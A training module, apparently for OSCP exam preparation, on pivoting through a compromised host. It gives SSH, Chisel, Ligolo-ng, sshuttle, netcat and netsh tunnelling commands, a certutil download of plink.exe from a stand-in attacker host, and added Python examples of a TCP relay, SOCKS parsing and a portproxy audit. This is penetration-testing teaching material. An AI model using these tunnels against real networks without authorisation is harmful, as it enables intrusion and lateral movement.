Post-Exploitation & Privilege Escalation

# Pivoting & Port Forwarding

Pivoting allows you to reach internal network segments through a compromised host. This is essential for OSCP's Active Directory portion.

## Understanding Pivoting

```text
Attacker ────────> Compromised Host ────────> Internal Network
10.10.14.5         192.168.1.10                172.16.1.0/24
                   (Dual-homed)
```
## SSH Port Forwarding

### Local Port Forwarding

Forward a port on the internal network to your local machine:

```bash
# Syntax
ssh -L [local_port]:[target_ip]:[target_port] user@pivot_host

# Example: access an internal web server
ssh -L 8080:172.16.1.20:80 user@192.168.1.10
# Now browse: http://localhost:8080

# Example: access internal SMB (binding a local port below 1024 needs root)
ssh -L 445:172.16.1.20:445 user@192.168.1.10
# Now use: smbclient //localhost/share
```

### Dynamic Port Forwarding (SOCKS Proxy)

Create a SOCKS proxy through the pivot and point your tools at it:

```bash
# Create SOCKS proxy on port 1080
ssh -D 1080 user@pivot_host

# Add to /etc/proxychains.conf
socks4 127.0.0.1 1080

# Run tools through the proxy
proxychains nmap -sT 172.16.1.0/24
proxychains curl http://172.16.1.20
```

### Remote Port Forwarding

Expose a local service to the remote network:

```bash
# Syntax
ssh -R [remote_port]:[local_ip]:[local_port] user@pivot_host

# Example: expose a local web server
ssh -R 8080:127.0.0.1:80 user@pivot_host
# Remote users can access your server at pivot_host:8080
# (the listener binds to the pivot's loopback unless sshd has GatewayPorts enabled)
```
## Chisel (Recommended for OSCP)

Chisel is a fast TCP/UDP tunnel transported over HTTP, which is why it passes firewalls that only allow web traffic.

### Setup

```bash
# On attacker (server mode, accepting reverse tunnels)
chisel server -p 8000 --reverse

# On pivot host (client mode, reverse SOCKS)
chisel client attacker-ip:8000 R:1080:socks
```

### Port Forwarding Examples

```bash
# Reverse SOCKS proxy
# Server: chisel server -p 8000 --reverse
# Client: chisel client 10.10.14.5:8000 R:1080:socks
# Use:    proxychains nmap -sT 172.16.1.20

# Forward a specific port
# Server:  chisel server -p 8000 --reverse
# Client:  chisel client 10.10.14.5:8000 R:3389:172.16.1.20:3389
# Connect: rdesktop localhost:3389
```
## Ligolo-ng (Modern Alternative)

Ligolo-ng hands you a tun interface instead of a SOCKS proxy, so tools need no proxychains; the interface and the route on the attacker side are the steps people most often forget.

```bash
# On attacker: start the proxy (self-signed cert) and create the tun interface
ligolo-proxy -selfcert
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

# On pivot host
ligolo-agent -connect attacker-ip:11601 -ignore-cert

# In the ligolo-proxy interface: select the agent's session, then start the tunnel
session
start

# Back on attacker: route the internal range over the tun interface
sudo ip route add 172.16.1.0/24 dev ligolo
```
## SSHuttle (Linux to Linux)

```bash
# Route all traffic for the internal network through the pivot
sshuttle -r user@pivot_host 172.16.1.0/24

# Multiple networks
sshuttle -r user@pivot_host 172.16.1.0/24 10.10.10.0/24
```
## Metasploit Pivoting (Use on One Machine Only)

```bash
# After getting a Meterpreter session
meterpreter> run autoroute -s 172.16.1.0/24

# Or add the route manually
msf> route add 172.16.1.0 255.255.255.0 [session_id]

# Use SOCKS proxy
msf> use auxiliary/server/socks_proxy
msf> set SRVPORT 1080
msf> run
```
## Netcat Relay

```bash
# Simple port forward (Linux): the FIFO carries the client's bytes to the target,
# the pipe carries the target's replies back to the listener
mkfifo /tmp/f
cat /tmp/f | nc 172.16.1.20 80 | nc -lvp 8080 > /tmp/f

# Windows (netsh from PowerShell or cmd, elevated prompt required)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.1.20
```
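The SSH `-L` forward and the netcat relay above do the same thing at the socket level: accept a connection on a local listener, open a second connection to the target, and copy bytes both ways until one side closes. The following added example (not code from the original page) implements that relay in Python with a constructed echo server standing in for the internal service, so the whole client-to-listener-to-target path can be exercised on loopback; `start_forwarder`, `start_echo_server` and `relay_roundtrip` are names chosen here.

```python
import socket
import threading

# Added example, not from the original page: a minimal TCP port forwarder that does
# what `ssh -L` or the mkfifo/nc relay does. From a defensive angle, this is exactly
# the shape of listener a host-based check looks for: an unexpected listening socket
# whose owning process also holds an outbound connection to another host.


def _pump(src, dst):
    """Copy bytes from src to dst until src closes, then close dst's write side
    so the peer sees EOF instead of hanging."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(target_host, target_port, listen_host="127.0.0.1", listen_port=0):
    """Listen on listen_host:listen_port and relay each accepted connection to the
    target. Returns the bound local port (listen_port=0 lets the OS pick one)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((listen_host, listen_port))
    listener.listen(5)

    def accept_loop():
        while True:
            client, _ = listener.accept()
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
            except OSError:
                client.close()          # target unreachable: drop the client
                continue
            # one thread per direction, like the two nc processes in the relay
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def start_echo_server():
    """Constructed stand-in for the 'internal' service: echoes one message back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                data = conn.recv(4096)
                if data:
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def relay_roundtrip(message=b"hello through the tunnel"):
    """Stand up the echo server and a forwarder in front of it, send a message
    through the forwarder and return what comes back."""
    target_port = start_echo_server()
    local_port = start_forwarder("127.0.0.1", target_port)
    with socket.create_connection(("127.0.0.1", local_port), timeout=5) as c:
        c.sendall(message)
        c.shutdown(socket.SHUT_WR)      # tell the relay we are done sending
        chunks = []
        while True:
            d = c.recv(4096)
            if not d:
                break
            chunks.append(d)
    return b"".join(chunks)


if __name__ == "__main__":
    print(relay_roundtrip())
```

Because the relay copies opaque bytes, it forwards any TCP protocol unchanged; that is also why such a listener reveals nothing about the final destination to a client-side observer, and why the pivot host's own socket table (`ss -tnp` on Linux) is the place to see both halves of the connection together.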
## Proxychains Configuration

### Setup

```bash
# Edit /etc/proxychains.conf
# Comment out: proxy_dns
# Add at bottom (match the SOCKS version your tunnel speaks):
socks4 127.0.0.1 1080
# or
socks5 127.0.0.1 1080
```

### Usage

```bash
# Nmap through proxy (TCP connect scans only, no ping probes)
proxychains nmap -sT -Pn 172.16.1.20

# SMB enumeration
proxychains smbclient -L //172.16.1.20 -N

# CrackMapExec
proxychains crackmapexec smb 172.16.1.0/24
```
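Both the `ssh -D` section and the proxychains setup above rely on the SOCKS protocol, and two of the page's caveats (TCP-only scanning, the `proxy_dns` setting) follow directly from its wire format. The added example below (not code from the page or from proxychains) builds the CONNECT requests a SOCKS client sends to the proxy and parses the replies, for SOCKS4, SOCKS4a and SOCKS5. The hostname `web.example.internal` and the reply bytes in the test are constructed; the function names are chosen here.

```python
import ipaddress
import struct

# Added example, not from the original page: the SOCKS CONNECT exchange that sits
# between proxychains and `ssh -D 1080`. CONNECT carries one TCP stream, which is
# why only `nmap -sT` works through it (no raw-socket SYN scans, no UDP, no ICMP).
# Where the destination name gets resolved depends on the address form: a SOCKS4
# request can only carry an IPv4 address (the client resolves it locally), while
# SOCKS4a and SOCKS5 can carry a hostname for the proxy to resolve on its side.

SOCKS4_GRANTED = 0x5A      # SOCKS4 reply code "request granted"
SOCKS5_SUCCEEDED = 0x00    # SOCKS5 REP field "succeeded"


def _is_ipv4(host):
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return False


def socks4_connect(host, port, userid=b""):
    """SOCKS4 CONNECT: VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL.
    A hostname switches to the SOCKS4a form: DSTIP=0.0.0.1 and the name appended."""
    if _is_ipv4(host):
        dstip = ipaddress.IPv4Address(host).packed
        tail = userid + b"\x00"
    else:
        dstip = b"\x00\x00\x00\x01"              # 0.0.0.x marks SOCKS4a
        tail = userid + b"\x00" + host.encode("idna") + b"\x00"
    return b"\x04\x01" + struct.pack(">H", port) + dstip + tail


def parse_socks4_reply(data):
    """Reply is 8 bytes: VN=0, CD, DSTPORT, DSTIP. True when the request was granted."""
    if len(data) < 8 or data[0] != 0x00:
        raise ValueError("malformed SOCKS4 reply")
    return data[1] == SOCKS4_GRANTED


def socks5_greeting():
    """Method negotiation offering only 'no authentication', which is what ssh -D uses."""
    return b"\x05\x01\x00"


def socks5_connect(host, port):
    """SOCKS5 CONNECT: VER=5, CMD=1, RSV=0, ATYP, DST.ADDR, DST.PORT.
    ATYP 0x01 is an IPv4 literal, 0x03 a length-prefixed domain name."""
    if _is_ipv4(host):
        addr = b"\x01" + ipaddress.IPv4Address(host).packed
    else:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack(">H", port)


def parse_socks5_reply(data):
    """Return (rep_code, bound_host, bound_port) from a SOCKS5 CONNECT reply."""
    if len(data) < 4 or data[0] != 0x05:
        raise ValueError("malformed SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == 0x01:
        host, off = str(ipaddress.IPv4Address(data[4:8])), 8
    elif atyp == 0x03:
        n = data[4]
        host, off = data[5:5 + n].decode("idna"), 5 + n
    elif atyp == 0x04:
        host, off = str(ipaddress.IPv6Address(data[4:20])), 20
    else:
        raise ValueError("unknown ATYP")
    port = struct.unpack(">H", data[off:off + 2])[0]
    return rep, host, port


if __name__ == "__main__":
    print(socks4_connect("172.16.1.20", 80).hex())
    print(socks5_connect("web.example.internal", 445).hex())
```

The `socks4` line in `/etc/proxychains.conf` therefore means every target must be an IPv4 address the tool already knows, whereas `socks5` lets proxychains hand a name to the tunnel; for a defender, a SOCKS listener bound on loopback that has no business being there, paired with a long-lived SSH or HTTP connection from the same process, is the observable.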
## Windows Pivoting Tools

### plink.exe (PuTTY)

```powershell
# Download plink
certutil -urlcache -split -f http://attacker/plink.exe plink.exe

# Dynamic port forward (SOCKS)
plink.exe -ssh -D 1080 user@attacker-ip

# Local port forward
plink.exe -ssh -L 8080:172.16.1.20:80 user@attacker-ip
```

### netsh Port Forwarding

```powershell
# Add port forward (elevated prompt required)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.1.20 connectport=80

# Show forwards
netsh interface portproxy show all

# Remove forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080
```
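`netsh interface portproxy` rules survive reboots (they are stored under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy`), so listing and auditing them is a routine post-incident check on Windows hosts. The added example below (not code from the page) parses the table `netsh interface portproxy show all` prints and flags forwards that listen on every interface or relay to another host. The sample output is constructed for this example, in the layout netsh uses, with one entry matching the page's own command; `parse_portproxy`, `audit_forward` and `audit_output` are names chosen here.

```python
import ipaddress
import re

# Added example, not from the original page: parse and audit the output of
# `netsh interface portproxy show all`. Sample output constructed for this example.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        172.16.1.20     80
127.0.0.1       9000        127.0.0.1       80

Listen on ipv6:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
"""

SECTION_RE = re.compile(r"^Listen on (ipv[46]):\s+Connect to (ipv[46]):")
# a data row is addr, numeric port, addr, numeric port; header and dashes don't match
ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text):
    """Turn netsh's tabular output into one dict per forward."""
    entries = []
    mode = None
    for raw in text.splitlines():
        line = raw.strip()
        sec = SECTION_RE.match(line)
        if sec:
            # "ipv4" -> "v4", giving netsh's own naming such as v4tov4
            mode = sec.group(1)[2:] + "to" + sec.group(2)[2:]
            continue
        row = ROW_RE.match(line)
        if row and mode:
            entries.append({
                "mode": mode,
                "listen_addr": row.group(1),
                "listen_port": int(row.group(2)),
                "connect_addr": row.group(3),
                "connect_port": int(row.group(4)),
            })
    return entries


def audit_forward(entry):
    """Return the reasons a forward deserves a second look (empty list = benign shape)."""
    reasons = []
    listen = ipaddress.ip_address(entry["listen_addr"])
    connect = ipaddress.ip_address(entry["connect_addr"])
    if listen.is_unspecified:
        reasons.append("listens on all interfaces")
    if not connect.is_loopback:
        reasons.append(f"relays to another host ({connect})")
    if listen.is_unspecified and connect.is_private:
        reasons.append("exposes an internal host to anyone who can reach this machine")
    return reasons


def audit_output(text=SAMPLE_NETSH_OUTPUT):
    """Parse and audit; returns {(listen_addr, listen_port): [reasons]} for flagged entries."""
    flagged = {}
    for entry in parse_portproxy(text):
        reasons = audit_forward(entry)
        if reasons:
            flagged[(entry["listen_addr"], entry["listen_port"])] = reasons
    return flagged


if __name__ == "__main__":
    for key, reasons in audit_output().items():
        print(key, "->", "; ".join(reasons))
```

Feed it the real command's output (`netsh interface portproxy show all > portproxy.txt` on the host) and any rule that is flagged but not on the change record is worth deleting with the `delete v4tov4` command above; the second sample row (loopback to loopback) shows the shape that passes the audit.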
## Pivoting Cheat Sheet
| Tool | Use Case | Command |
|---|---|---|
| SSH -L | Local forward | ssh -L 8080:target:80 user@pivot |
| SSH -D | SOCKS proxy | ssh -D 1080 user@pivot |
| Chisel | Firewall bypass | chisel client ip:port R:1080:socks |
| SSHuttle | Route traffic | sshuttle -r user@pivot 10.0.0.0/24 |
| Proxychains | Use proxy | proxychains nmap target |
## Pivoting Workflow

1. Identify internal networks from the compromised host: `ip a`, `route`, `arp -a`
2. Set up the tunnel/pivot: Chisel, SSH, Ligolo
3. Configure proxychains: `/etc/proxychains.conf`
4. Enumerate the internal network: `proxychains nmap -sT`
5. Attack internal targets: `proxychains crackmapexec smb`

With pivoting mastered, we'll move to Active Directory attacks and exam simulation in the final module.